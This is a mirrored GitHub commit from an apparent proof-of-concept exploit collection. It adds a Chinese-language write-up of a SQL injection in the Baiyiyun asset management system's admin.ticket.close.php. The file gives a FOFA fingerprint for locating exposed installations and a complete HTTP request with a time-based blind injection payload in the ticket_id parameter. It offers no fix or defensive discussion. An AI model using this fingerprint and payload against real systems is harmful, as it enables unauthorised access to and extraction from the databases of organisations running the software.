admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md

Browse Source
This commit is contained in:
Nexolanta 2025-03-06 17:37:53 +08:00 committed by GitHub
parent 2e97384d8f
commit 67334e6ee9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
wpoc/百易云资产管理系统/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md
View File

@ -1 +1,22 @@
# 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞
百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞
## fofa
```javascript
body="不要着急,点此"
```
## poc
```javascript
GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
```